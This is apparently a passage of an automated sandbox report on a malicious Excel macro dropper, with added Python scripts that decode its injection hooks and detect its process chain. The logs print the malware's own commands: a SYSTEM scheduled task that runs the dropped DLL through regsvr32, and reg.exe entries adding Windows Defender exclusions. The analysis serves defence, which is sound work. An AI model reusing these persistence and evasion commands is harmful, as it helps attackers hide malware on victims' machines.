    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Claim-1763045001-09242021.xlsOLE indicator, Workbook stream: true
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\Global\{D1419B89-9A47-41E4-9AA8-B0F941DFA569}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{41D88538-A581-48EE-817B-4B83E858129B}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{3B61A1E7-F95A-4DF7-8B38-17FBF69C0843}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{41D88538-A581-48EE-817B-4B83E858129B}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{3B61A1E7-F95A-4DF7-8B38-17FBF69C0843}
    Source: C:\Windows\SysWOW64\explorer.exeMutant created: \BaseNamedObjects\{D1419B89-9A47-41E4-9AA8-B0F941DFA569}
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000A51A FindResourceA,
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000049.00000003.1179566339.0000000002731000.00000004.00000001.sdmp
    Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000037.00000002.1179167392.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000049.00000003.1180826805.0000000002731000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10027D58 pushfd ; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10027679 push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10023B27 push es; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10022F6D push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10022FAA push eax; retf
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000DA00E push ebx; ret
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000DD485 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000DD4B6 push FFFFFF8Ah; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000D9D5C push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000D9E5E push cs; iretd
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000DBB29 push esi; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10027D58 pushfd ; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10027679 push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10023B27 push es; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10022F6D push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10022FAA push eax; retf
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_1002202C push es; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_10021C96 pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_10026105 push edi; ret
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_1002514B pushad ; iretd
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
    Source: 44463.6863100694[2].dat.0.drStatic PE information: real checksum: 0x7af7b should be: 0x22282
    Source: Fiosa1.der.0.drStatic PE information: real checksum: 0x7af7b should be: 0x22282
    Source: Fiosa.der.73.drStatic PE information: real checksum: 0x7af7b should be: 0xfeba5
    Source: 44463.6863100694[1].dat.0.drStatic PE information: real checksum: 0x7af7b should be: 0x100e78
    Source: Fiosa2.der.86.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
    Source: Fiosa.der.87.drStatic PE information: real checksum: 0x7af7b should be: 0x88ca7
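
The "real checksum ... should be" rows compare the CheckSum stored in each dropped file's optional header with the value recomputed over the file. Every dropped file carries the same stored value, 0x7af7b, while the recomputed values differ with file size, which is consistent with the files having been altered after linking (the report also flags data appended to the last section) without the header being refreshed. The script below is an added example for this page, not Joe Sandbox code: it implements the checksum the way imagehlp's CheckSumMappedFile does (ones'-complement sum of 16-bit words with the CheckSum field excluded, folded to 16 bits, plus the file length) and runs it over a constructed minimal PE header, not one of the dropped files, into which the report's stored value has been written.

```python
"""Recompute the PE optional-header CheckSum and compare it with the stored
value, which is the comparison behind the 'real checksum ... should be' rows.

Added example, not Joe Sandbox code. SAMPLE is a constructed minimal PE header,
not one of the dropped files; the only value taken from the report is the
stored CheckSum 0x7AF7B that every dropped file carries.
"""
import struct

STORED_CHECKSUM_FROM_REPORT = 0x7AF7B


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (same for PE32 and PE32+)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # 4-byte signature + 20-byte IMAGE_FILE_HEADER + 0x40 into the optional header
    return e_lfanew + 4 + 20 + 0x40


def pe_checksum(data: bytes) -> int:
    """CheckSum as imagehlp computes it: ones'-complement sum of all 16-bit
    words (the 4-byte CheckSum field excluded), folded to 16 bits, plus the
    file length in bytes."""
    cs_off = checksum_field_offset(data)
    padded = data + b"\0" * (len(data) % 2)         # an odd trailing byte counts as a word
    total = 0
    for off in range(0, len(padded), 2):
        if off in (cs_off, cs_off + 2):              # skip the CheckSum field itself
            continue
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)     # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    return total + len(data)


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def with_checksum(data: bytes, value: int) -> bytes:
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(data), value)
    return bytes(buf)


def checksum_matches(data: bytes) -> bool:
    return stored_checksum(data) == pe_checksum(data)


def build_sample_pe() -> bytes:
    """Constructed input: DOS header, PE signature, file header and a zeroed
    PE32 optional header, with the report's stored CheckSum written in."""
    buf = bytearray(0x40 + 4 + 20 + 0xE0)           # 0x138 bytes in total
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)          # e_lfanew
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x44, 0x014C)        # Machine = IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", buf, 0x54, 0xE0)          # SizeOfOptionalHeader
    struct.pack_into("<H", buf, 0x58, 0x010B)        # Magic = PE32
    return with_checksum(bytes(buf), STORED_CHECKSUM_FROM_REPORT)


SAMPLE = build_sample_pe()

if __name__ == "__main__":
    print(f"stored {stored_checksum(SAMPLE):#x}, computed {pe_checksum(SAMPLE):#x}, "
          f"match: {checksum_matches(SAMPLE)}")
    fixed = with_checksum(SAMPLE, pe_checksum(SAMPLE))
    print(f"after rewriting the field: match: {checksum_matches(fixed)}")
```

pefile exposes the same computation as PE.generate_checksum() and PE.verify_checksum(). A mismatch on its own is weak evidence (many user-mode binaries ship with a zero or stale field; the loader only enforces it for drivers and for DLLs loaded into critical processes), but the same stored value across files of different sizes, as in the rows above, is a cheap triage signal that the files share a template that was patched after linking.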

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: reg.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa1.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa2.der
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa.der
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa2.der
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[2].dat
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa2.der
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa1.der
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa2.der
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa1.der

Boot Survival:

Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa2.der
Source: C:\Windows\SysWOW64\explorer.exe | File created: C:\Users\user\Fiosa.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Fiosa1.der
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 984 base: 8A102D value: E9 BA 4C 82 FF
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2912 base: 8A102D value: E9 BA 4C 7E FF
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 548 base: 8A102D value: E9 BA 4C 7E FF
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOOPENFILEERRORBOX
Source: Claim-1763045001-09242021.xls | Stream path 'Workbook' entropy: 7.94597570807 (max. 8.0)
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3024 | Thread sleep count: 43 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 1976 | Thread sleep time: -124000s >= -30000s
Source: C:\Windows\System32\taskeng.exe TID: 572 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 668 | Thread sleep count: 47 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 244 | Thread sleep count: 47 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 196 | Thread sleep count: 128 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 196 | Thread sleep time: -96000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe | Last function: Thread delayed
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[1].dat
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[2].dat
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_1000AEB4 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 73_2_000CAEB4 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 86_2_0008AEB4 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 87_2_0008AEB4 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_10029660 GetProcessHeap,RtlAllocateHeap,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_1007792E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_1007785D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 55_2_10077464 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 83_2_1007792E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 83_2_1007785D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 83_2_10077464 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 85_2_1007792E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 85_2_1007785D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 85_2_10077464 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 73_2_000C5A61 RtlAddVectoredExceptionHandler,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 87_2_00085A61 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: F0000
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 8A102D
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 8A102D
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 8A102D
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 984 base: F0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 984 base: 8A102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2912 base: B0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 2912 base: 8A102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 548 base: B0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: PID: 548 base: 8A102D value: E9
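
The "Memory written ... value: E9" rows here and the three full five-byte writes under "Overwrites code with unconditional jumps" above are one hook: a near jump (opcode E9 followed by a signed 32-bit displacement) written at the same address, 0x8A102D, in each of the three explorer.exe processes, with the displacement re-encoded per process. Decoding it shows where each jump lands. The script below is an added example, not Joe Sandbox code; the addresses and bytes are copied from those rows, while the injected-image bases (0xC0000 for PID 984, 0x80000 for the other two) are this script's assumption, inferred from the explorer.exe function addresses the report lists (73_2_000C5A61 and 87_2_00085A61 for RtlAddVectoredExceptionHandler), not values the report states.

```python
"""Decode the E9 rel32 hook that regsvr32.exe writes into each explorer.exe and
map the jump target back to an offset inside the injected image.

Added example, not Joe Sandbox code. HOOK_WRITES is copied from the report's
'Memory written' rows; INJECTED_BASE is this script's assumption, inferred
from the explorer.exe function addresses the report lists, not a value the
report states.
"""
import struct

# (pid, address written, bytes written), copied from the report.
HOOK_WRITES = [
    (984,  0x8A102D, bytes.fromhex("E9BA4C82FF")),
    (2912, 0x8A102D, bytes.fromhex("E9BA4C7EFF")),
    (548,  0x8A102D, bytes.fromhex("E9BA4C7EFF")),
]
# Assumed base of the injected image in each explorer.exe (see docstring).
INJECTED_BASE = {984: 0xC0000, 2912: 0x80000, 548: 0x80000}


def decode_jmp_rel32(address: int, code: bytes) -> int:
    """Absolute target of a 5-byte 'E9 rel32' near jump located at `address`.

    rel32 is a signed 32-bit displacement relative to the address of the next
    instruction, i.e. address + 5.
    """
    if len(code) < 5 or code[0] != 0xE9:
        raise ValueError("not an E9 rel32 near jump")
    rel32 = struct.unpack_from("<i", code, 1)[0]
    return (address + 5 + rel32) & 0xFFFFFFFF


def encode_jmp_rel32(address: int, target: int) -> bytes:
    """Inverse of decode_jmp_rel32: the 5 bytes that jump from `address` to `target`."""
    rel32 = (target - (address + 5) + 0x80000000) % 0x100000000 - 0x80000000
    return b"\xE9" + struct.pack("<i", rel32)


def resolve_hooks(writes=HOOK_WRITES, bases=INJECTED_BASE):
    """For each hook: the patched address, the jump target, and the target's
    offset from the assumed injected-image base in that process."""
    rows = []
    for pid, address, code in writes:
        target = decode_jmp_rel32(address, code)
        rows.append({"pid": pid, "hooked": address, "target": target,
                     "offset": target - bases[pid]})
    return rows


if __name__ == "__main__":
    for row in resolve_hooks():
        print(f"PID {row['pid']:>5}: jmp at {row['hooked']:#010x} -> "
              f"{row['target']:#010x} (offset {row['offset']:#x} into injected image)")
```

Both displacements resolve to the same offset, 0x5CEC, from the assumed base in their process (0xC5CEC and 0x85CEC), which is what you expect when one payload image is mapped at a different base per process and the jump is re-encoded for each. The 0x9C byte written to F0000 and B0000 in the rows above is a pushfd opcode at the start of the separately allocated read-write buffer; this script does not decode that buffer.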
Yara detected hidden Macro 4.0 in Excel
Source: Yara match | File source: Claim-1763045001-09242021.xls, type: SAMPLE
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Windows\System32\taskeng.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gurxzqhuuwqa' /d '0'
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
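
The "Process created" rows (here, in the long run above, and under Persistence and Boot Survival) describe one chain: EXCEL.EXE runs regsvr32 with -silent on a file whose extension is not .dll, the 32-bit regsvr32 starts a SysWOW64 explorer.exe, and that explorer.exe adds two Windows Defender path exclusions with reg.exe and registers a scheduled task that runs regsvr32 -s on the dropped file as NT AUTHORITY\SYSTEM, which taskeng.exe then launches. The Defender rows use the registry layout Defender actually keeps for path exclusions (value name = the excluded path, REG_DWORD 0), so a successful reg.exe ADD there is not a no-op. The script below is an added example for this page, not Joe Sandbox or Sigma code: it turns those rows into parent/child events and applies five rules that correspond to the signatures fired above. The first six events are copied from the rows; the seventh is a constructed benign control, and the rule names, the Office/LOLBin lists and the set of legitimate explorer.exe parents are this script's own assumptions.

```python
"""Detection rules over 'Process created' events taken from the report.

Added example for this page, not Joe Sandbox or Sigma code. Each event is
'parent image | child command line'. The first six events are copied from the
report rows; the seventh is a constructed benign control. Rule names, the
Office/LOLBin lists and EXPLORER_PARENTS are this script's own assumptions.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "powershell.exe", "cmd.exe", "certutil.exe"}
EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}  # assumed normal logon chain
DLL_EXTENSIONS = {"dll", "ocx", "ax"}

EVENTS = [
    r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | regsvr32 -silent ..\Fiosa.der",
    r"C:\Windows\System32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der",
    r"C:\Windows\SysWOW64\regsvr32.exe | C:\Windows\SysWOW64\explorer.exe",
    r"C:\Windows\SysWOW64\explorer.exe | 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM'"
    r" /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48",
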